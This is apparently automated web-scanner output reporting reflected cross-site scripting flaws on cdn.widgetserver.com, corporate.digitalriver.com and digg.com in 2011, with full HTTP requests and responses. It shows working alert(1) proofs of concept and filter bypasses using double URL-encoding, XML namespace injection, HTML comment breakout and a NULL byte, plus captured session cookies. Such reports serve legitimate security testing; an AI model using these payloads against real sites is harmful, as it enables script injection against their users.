Path:	/syndication/xml/i/50c75bf0-9bd2-4e0d-b0e2-50ade412a01b/iv/6/n/code/nv/4/p/2/r/3e9af2de-ad31-438b-a809-221776504656/rv/506/t/ea9cc84e81960189044ee72fbaecb29feddefc19000001322dae5ccd/u/3/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c8c38<a>b279ab99d94 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /syndication/xml/i/50c75bf0-9bd2-4e0d-b0e2-50ade412a01bc8c38<a>b279ab99d94/iv/6/n/code/nv/4/p/2/r/3e9af2de-ad31-438b-a809-221776504656/rv/506/t/ea9cc84e81960189044ee72fbaecb29feddefc19000001322dae5ccd/u/3/ HTTP/1.1
Host: cdn.widgetserver.com
Proxy-Connection: keep-alive
Referer: http://cdn.widgetserver.com/syndication/flash/blidget/blidget.swf?cb=53801
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/xml;charset=UTF-8
Date: Sun, 04 Sep 2011 12:22:50 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Vary: Accept-Encoding
X-WBX: web16
Content-Length: 1696

<response><widgets><widget><token>ea9cc84e81960189044ee72fbaecb29feddefc19000001322dae5ccd</token><app-id>50c75bf0-9bd2-4e0d-b0e2-50ade412a01bc8c38<a>b279ab99d94</app-id><reg-id></reg-id><friendly-id>
...[SNIP]...

Summary

Severity:	High
Confidence:	Certain
Host:	http://cdn.widgetserver.com
Path:	/syndication/xml/i/5e8294c2-2294-4553-8c7c-48f8c9ba9b95/iv/10/n/code/nv/4/p/2/r/3e9af2de-ad31-438b-a809-221776504656/rv/506/t/978aca9d1ea8e4d20919ae3c80f63034741644a7000001322c7cacb3/u/3/

Issue detail

The value of REST URL parameter 18 is copied into the XML document as plain text between tags. The payload f7074%253ca%2520xmlns%253aa%253d%2527http%253a%252f%252fwww%252ew3%252eorg%252f1999%252fxhtml%2527%253e%253ca%253abody%2520onload%253d%2527alert%25281%2529%2527%252f%253e%253c%252fa%253e45eea47d5f9 was submitted in the REST URL parameter 18. This input was echoed as f7074<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>45eea47d5f9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.

Remediation detail

Request

GET /syndication/xml/i/5e8294c2-2294-4553-8c7c-48f8c9ba9b95/iv/10/n/code/nv/4/p/2/r/3e9af2de-ad31-438b-a809-221776504656/rv/506/t/978aca9d1ea8e4d20919ae3c80f63034741644a7000001322c7cacb3f7074%253ca%2520xmlns%253aa%253d%2527http%253a%252f%252fwww%252ew3%252eorg%252f1999%252fxhtml%2527%253e%253ca%253abody%2520onload%253d%2527alert%25281%2529%2527%252f%253e%253c%252fa%253e45eea47d5f9/u/3/ HTTP/1.1
Host: cdn.widgetserver.com
Proxy-Connection: keep-alive
Referer: http://cdn.widgetserver.com/syndication/flash/blidget/blidget.swf?cb=53801
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/xml;charset=UTF-8
Date: Sun, 04 Sep 2011 12:21:17 GMT
Expires: Wed, 07 Sep 2011 12:20:17 GMT
ObjectVersions: [Inst: req 10, db 10]; [Reg: req 506, db 506];
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Vary: Accept-Encoding
X-WBX: web16
Content-Length: 3475

<response><widgets><widget><token>978aca9d1ea8e4d20919ae3c80f63034741644a7000001322c7cacb3f7074<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>45eea47d5f9</token><app-id>5e829
...[SNIP]...

Summary

Severity:	High
Confidence:	Firm
Host:	http://cdn.widgetserver.com
Path:	/syndication/xml/i/5e8294c2-2294-4553-8c7c-48f8c9ba9b95/iv/10/n/code/nv/4/p/2/r/3e9af2de-ad31-438b-a809-221776504656/rv/506/t/978aca9d1ea8e4d20919ae3c80f63034741644a7000001322c7cacb3/u/3/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 459b4<a>68c24a8a00c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /syndication/xml/i/5e8294c2-2294-4553-8c7c-48f8c9ba9b95459b4<a>68c24a8a00c/iv/10/n/code/nv/4/p/2/r/3e9af2de-ad31-438b-a809-221776504656/rv/506/t/978aca9d1ea8e4d20919ae3c80f63034741644a7000001322c7cacb3/u/3/ HTTP/1.1
Host: cdn.widgetserver.com
Proxy-Connection: keep-alive
Referer: http://cdn.widgetserver.com/syndication/flash/blidget/blidget.swf?cb=53801
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/xml;charset=UTF-8
Date: Sun, 04 Sep 2011 12:20:01 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Vary: Accept-Encoding
X-WBX: web02
Content-Length: 1696

<response><widgets><widget><token>978aca9d1ea8e4d20919ae3c80f63034741644a7000001322c7cacb3</token><app-id>5e8294c2-2294-4553-8c7c-48f8c9ba9b95459b4<a>68c24a8a00c</app-id><reg-id></reg-id><friendly-id>
...[SNIP]...

Summary

Severity:	High
Confidence:	Certain
Host:	http://cdn.widgetserver.com
Path:	/syndication/xml/i/7c07d8dd-4e86-4b13-a149-43e380ed321d/iv/6/n/code/nv/4/p/2/r/3e9af2de-ad31-438b-a809-221776504656/rv/506/t/117428c72af95bf997ad05ff0976aa5ae7f12be5000001322d9f1773/u/3/

Issue detail

The value of REST URL parameter 18 is copied into the XML document as plain text between tags. The payload 369f9%253ca%2520xmlns%253aa%253d%2527http%253a%252f%252fwww%252ew3%252eorg%252f1999%252fxhtml%2527%253e%253ca%253abody%2520onload%253d%2527alert%25281%2529%2527%252f%253e%253c%252fa%253e954af5fe941 was submitted in the REST URL parameter 18. This input was echoed as 369f9<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>954af5fe941 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.

Remediation detail

Request

GET /syndication/xml/i/7c07d8dd-4e86-4b13-a149-43e380ed321d/iv/6/n/code/nv/4/p/2/r/3e9af2de-ad31-438b-a809-221776504656/rv/506/t/117428c72af95bf997ad05ff0976aa5ae7f12be5000001322d9f1773369f9%253ca%2520xmlns%253aa%253d%2527http%253a%252f%252fwww%252ew3%252eorg%252f1999%252fxhtml%2527%253e%253ca%253abody%2520onload%253d%2527alert%25281%2529%2527%252f%253e%253c%252fa%253e954af5fe941/u/3/ HTTP/1.1
Host: cdn.widgetserver.com
Proxy-Connection: keep-alive
Referer: http://cdn.widgetserver.com/syndication/flash/blidget/blidget.swf?cb=53801
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/xml;charset=UTF-8
Date: Sun, 04 Sep 2011 12:25:20 GMT
Expires: Wed, 07 Sep 2011 12:24:20 GMT
ObjectVersions: [Inst: req 6, db 6]; [Reg: req 506, db 506];
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Vary: Accept-Encoding
X-WBX: web15
Content-Length: 3473

<response><widgets><widget><token>117428c72af95bf997ad05ff0976aa5ae7f12be5000001322d9f1773369f9<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>954af5fe941</token><app-id>7c07d
...[SNIP]...

Summary

Severity:	High
Confidence:	Firm
Host:	http://cdn.widgetserver.com
Path:	/syndication/xml/i/7c07d8dd-4e86-4b13-a149-43e380ed321d/iv/6/n/code/nv/4/p/2/r/3e9af2de-ad31-438b-a809-221776504656/rv/506/t/117428c72af95bf997ad05ff0976aa5ae7f12be5000001322d9f1773/u/3/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e7a82<a>c05cd7645ad was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /syndication/xml/i/7c07d8dd-4e86-4b13-a149-43e380ed321de7a82<a>c05cd7645ad/iv/6/n/code/nv/4/p/2/r/3e9af2de-ad31-438b-a809-221776504656/rv/506/t/117428c72af95bf997ad05ff0976aa5ae7f12be5000001322d9f1773/u/3/ HTTP/1.1
Host: cdn.widgetserver.com
Proxy-Connection: keep-alive
Referer: http://cdn.widgetserver.com/syndication/flash/blidget/blidget.swf?cb=53801
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/xml;charset=UTF-8
Date: Sun, 04 Sep 2011 12:24:02 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Vary: Accept-Encoding
X-WBX: web03
Content-Length: 1696

<response><widgets><widget><token>117428c72af95bf997ad05ff0976aa5ae7f12be5000001322d9f1773</token><app-id>7c07d8dd-4e86-4b13-a149-43e380ed321de7a82<a>c05cd7645ad</app-id><reg-id></reg-id><friendly-id>
...[SNIP]...

Summary

Severity:	High
Confidence:	Certain
Host:	http://cdn.widgetserver.com
Path:	/syndication/xml/i/8334ea93-781f-4bce-bc32-094c3ddcee36/iv/6/n/code/nv/4/p/2/r/3e9af2de-ad31-438b-a809-221776504656/rv/506/t/b80ba304ef1c35dcdad3189bdbcfd323ab4bdea4000001322d93d756/u/3/

Issue detail

The value of REST URL parameter 18 is copied into the XML document as plain text between tags. The payload 87d1a%253ca%2520xmlns%253aa%253d%2527http%253a%252f%252fwww%252ew3%252eorg%252f1999%252fxhtml%2527%253e%253ca%253abody%2520onload%253d%2527alert%25281%2529%2527%252f%253e%253c%252fa%253efda49cd4e59 was submitted in the REST URL parameter 18. This input was echoed as 87d1a<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>fda49cd4e59 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.

Remediation detail

Request

GET /syndication/xml/i/8334ea93-781f-4bce-bc32-094c3ddcee36/iv/6/n/code/nv/4/p/2/r/3e9af2de-ad31-438b-a809-221776504656/rv/506/t/b80ba304ef1c35dcdad3189bdbcfd323ab4bdea4000001322d93d75687d1a%253ca%2520xmlns%253aa%253d%2527http%253a%252f%252fwww%252ew3%252eorg%252f1999%252fxhtml%2527%253e%253ca%253abody%2520onload%253d%2527alert%25281%2529%2527%252f%253e%253c%252fa%253efda49cd4e59/u/3/ HTTP/1.1
Host: cdn.widgetserver.com
Proxy-Connection: keep-alive
Referer: http://cdn.widgetserver.com/syndication/flash/blidget/blidget.swf?cb=53801
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/xml;charset=UTF-8
Date: Sun, 04 Sep 2011 12:23:00 GMT
Expires: Wed, 07 Sep 2011 12:22:00 GMT
ObjectVersions: [Inst: req 6, db 6]; [Reg: req 506, db 506];
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Vary: Accept-Encoding
X-WBX: web16
Content-Length: 3473

<response><widgets><widget><token>b80ba304ef1c35dcdad3189bdbcfd323ab4bdea4000001322d93d75687d1a<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>fda49cd4e59</token><app-id>8334e
...[SNIP]...

Summary

Severity:	High
Confidence:	Firm
Host:	http://cdn.widgetserver.com
Path:	/syndication/xml/i/8334ea93-781f-4bce-bc32-094c3ddcee36/iv/6/n/code/nv/4/p/2/r/3e9af2de-ad31-438b-a809-221776504656/rv/506/t/b80ba304ef1c35dcdad3189bdbcfd323ab4bdea4000001322d93d756/u/3/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f6ed4<a>4e2f98ce392 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /syndication/xml/i/8334ea93-781f-4bce-bc32-094c3ddcee36f6ed4<a>4e2f98ce392/iv/6/n/code/nv/4/p/2/r/3e9af2de-ad31-438b-a809-221776504656/rv/506/t/b80ba304ef1c35dcdad3189bdbcfd323ab4bdea4000001322d93d756/u/3/ HTTP/1.1
Host: cdn.widgetserver.com
Proxy-Connection: keep-alive
Referer: http://cdn.widgetserver.com/syndication/flash/blidget/blidget.swf?cb=53801
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/xml;charset=UTF-8
Date: Sun, 04 Sep 2011 12:21:41 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Vary: Accept-Encoding
X-WBX: web16
Content-Length: 1696

<response><widgets><widget><token>b80ba304ef1c35dcdad3189bdbcfd323ab4bdea4000001322d93d756</token><app-id>8334ea93-781f-4bce-bc32-094c3ddcee36f6ed4<a>4e2f98ce392</app-id><reg-id></reg-id><friendly-id>
...[SNIP]...

Summary

Severity:	High
Confidence:	Certain
Host:	http://cdn.widgetserver.com
Path:	/syndication/xml/i/a43042dd-c472-4930-a919-f43bb2d1f2bf/iv/6/n/code/nv/4/p/2/r/3e9af2de-ad31-438b-a809-221776504656/rv/506/t/370016ce47009b49084287e2f14e2ed91c295315000001322d9ed98f/u/3/

Issue detail

The value of REST URL parameter 18 is copied into the XML document as plain text between tags. The payload 571a5%253ca%2520xmlns%253aa%253d%2527http%253a%252f%252fwww%252ew3%252eorg%252f1999%252fxhtml%2527%253e%253ca%253abody%2520onload%253d%2527alert%25281%2529%2527%252f%253e%253c%252fa%253ee21715199ab was submitted in the REST URL parameter 18. This input was echoed as 571a5<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>e21715199ab in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.

Remediation detail

Request

GET /syndication/xml/i/a43042dd-c472-4930-a919-f43bb2d1f2bf/iv/6/n/code/nv/4/p/2/r/3e9af2de-ad31-438b-a809-221776504656/rv/506/t/370016ce47009b49084287e2f14e2ed91c295315000001322d9ed98f571a5%253ca%2520xmlns%253aa%253d%2527http%253a%252f%252fwww%252ew3%252eorg%252f1999%252fxhtml%2527%253e%253ca%253abody%2520onload%253d%2527alert%25281%2529%2527%252f%253e%253c%252fa%253ee21715199ab/u/3/ HTTP/1.1
Host: cdn.widgetserver.com
Proxy-Connection: keep-alive
Referer: http://cdn.widgetserver.com/syndication/flash/blidget/blidget.swf?cb=53801
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/xml;charset=UTF-8
Date: Sun, 04 Sep 2011 12:23:12 GMT
Expires: Wed, 07 Sep 2011 12:22:12 GMT
ObjectVersions: [Inst: req 6, db 6]; [Reg: req 506, db 506];
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Vary: Accept-Encoding
X-WBX: web04
Content-Length: 3473

<response><widgets><widget><token>370016ce47009b49084287e2f14e2ed91c295315000001322d9ed98f571a5<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>e21715199ab</token><app-id>a4304
...[SNIP]...

Summary

Severity:	High
Confidence:	Firm
Host:	http://cdn.widgetserver.com
Path:	/syndication/xml/i/a43042dd-c472-4930-a919-f43bb2d1f2bf/iv/6/n/code/nv/4/p/2/r/3e9af2de-ad31-438b-a809-221776504656/rv/506/t/370016ce47009b49084287e2f14e2ed91c295315000001322d9ed98f/u/3/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 6cb5e<a>fa25a69a60 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /syndication/xml/i/a43042dd-c472-4930-a919-f43bb2d1f2bf6cb5e<a>fa25a69a60/iv/6/n/code/nv/4/p/2/r/3e9af2de-ad31-438b-a809-221776504656/rv/506/t/370016ce47009b49084287e2f14e2ed91c295315000001322d9ed98f/u/3/ HTTP/1.1
Host: cdn.widgetserver.com
Proxy-Connection: keep-alive
Referer: http://cdn.widgetserver.com/syndication/flash/blidget/blidget.swf?cb=53801
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/xml;charset=UTF-8
Date: Sun, 04 Sep 2011 12:21:55 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Vary: Accept-Encoding
X-WBX: web03
Content-Length: 1695

<response><widgets><widget><token>370016ce47009b49084287e2f14e2ed91c295315000001322d9ed98f</token><app-id>a43042dd-c472-4930-a919-f43bb2d1f2bf6cb5e<a>fa25a69a60</app-id><reg-id></reg-id><friendly-id><
...[SNIP]...

1.21. http://corporate.digitalriver.com/store [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://corporate.digitalriver.com
Path:	/store

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 87700-->42ee04a8087 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to can close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /store?Action=DisplayProductSearchResultsPage&SiteID=digriv&Locale=en_US&ThemeID=16015700&CallingPageID=CorpPage&keywords=xss&x=0&y=0&87700-->42ee04a8087=1 HTTP/1.1
Host: corporate.digitalriver.com
Proxy-Connection: keep-alive
Referer: http://corporate.digitalriver.com/store/digriv/Corp/sectionName.company/subSectionName.aboutUs/page.aboutUs
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: op537homegum=a00602v02x278vq07m15wd278vr08s2xm1011; op646kaspersky_us_storepageliid=a01603h0892794r05t3df82794r05y3aoe389; ORA_WX_SESSION="10.1.2.197:260-0#0"; JSESSIONID=FDCBEABE0227856E4B45473D1B48DB8F; BIGipServerp-drh-dc1pod5-pool1-active=3305242890.260.0000; op393dr_homepage_demogum=a04006j09d2794r06b26c1afe; op393dr_homepage_demoliid=a04006j09d2794r06b26c1afe; fcOOS=fcOptOutChip=undefined; fcR=http%3A//www.digitalriver.com/; VISITOR_ID=971D4E8DFAED43674226FBB5874B1E2464458604C3469C26; op393dr_homepage_demo1gum=a04e07i0a12794q0643tzdbaf; op393dr_homepage_demo1liid=a04e07i0a12794q0643tzdbaf; __utma=94877326.899275530.1315145846.1315145846.1315145846.1; __utmb=94877326.3.10.1315145846; __utmc=94877326; __utmz=94877326.1315145846.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=94877326.899275530.1315145846.1315145846.1315145846.1; __utmb=94877326.3.10.1315145846; __utmc=94877326; __utmz=94877326.1315145846.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fcP=C=0&T=1315145843991&DTO=1315145843969&U=708273219&V=1315145926231; fcPT=http%3A//corporate.digitalriver.com/store/digriv/Corp/sectionName.company/subSectionName.aboutUs/page.aboutUs; fcC=X=C708273219&Y=1315145926358&FV=10&H=1315145926231&fcTHR=www.digitalriver.com}www.drcorporate.com,store.digitalriver.com}www.store-dr.com&Z=2&E=201359&F=0&I=1315145947293

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=114053839011,0)
Date: Sun, 04 Sep 2011 14:19:10 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc1app53
Content-Length: 48029

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head>
42ee04a8087=1&Action=DisplayESIPage&CallingPageID=CorpPage&Currency=USD&ESIHC=69e81329&Env=BASE&Locale=en_US&SiteID=digriv&StyleID=27010600&StyleVersion=76&ThemeID=16015700&ceid=173655500&cename=TopHeader&id=Prod
...[SNIP]...

1.22. http://corporate.digitalriver.com/store/digriv/html/pbPage.Homepage [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://corporate.digitalriver.com
Path:	/store/digriv/html/pbPage.Homepage

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload da9c3--><script>alert(1)</script>dd29a7ec5c0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /store/digriv/html/pbPage.Homepage?resid=TmOIUAoBAlUAAARDMJwAAAAN&rests=1315145806740&da9c3--><script>alert(1)</script>dd29a7ec5c0=1 HTTP/1.1
Host: corporate.digitalriver.com
Proxy-Connection: keep-alive
Referer: http://corporate.digitalriver.com/store/driv/en_US/ContentTheme/pbPage.Homepage/sectionName.home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: op537homegum=a00602v02x278vq07m15wd278vr08s2xm1011; op646kaspersky_us_storepageliid=a01603h0892794r05t3df82794r05y3aoe389; ORA_WX_SESSION="10.1.2.197:260-0#0"; JSESSIONID=FDCBEABE0227856E4B45473D1B48DB8F; BIGipServerp-drh-dc1pod5-pool1-active=3305242890.260.0000; op393dr_homepage_demogum=a04006j09d2794r06b26c1afe; op393dr_homepage_demoliid=a04006j09d2794r06b26c1afe; fcOOS=fcOptOutChip=undefined; fcP=C=0&T=1315145843991&DTO=1315145843969&U=708273219&V=1315145843969; fcR=http%3A//www.digitalriver.com/; fcPT=http%3A//corporate.digitalriver.com/store/driv/en_US/ContentTheme/pbPage.Homepage/sectionName.home; fcC=X=C708273219&Y=1315145843991&FV=10&H=1315145843969&fcTHR=www.digitalriver.com}www.drcorporate.com,store.digitalriver.com}www.store-dr.com&Z=0&E=5035601&F=0&I=1315145844054; VISITOR_ID=971D4E8DFAED43674226FBB5874B1E2464458604C3469C26

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=23859444886,0)
Date: Sun, 04 Sep 2011 14:17:51 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc1app58
Content-Length: 67580

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head>
<script>alert(1)</script>dd29a7ec5c0=1&id=ContentTheme&pbPage=Homepage&script>
...[SNIP]...

1.23. http://digg.com/submit [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://digg.com
Path:	/submit

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %008affd"><script>alert(1)</script>0f044f917b8 was submitted in the REST URL parameter 1. This input was echoed as 8affd"><script>alert(1)</script>0f044f917b8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

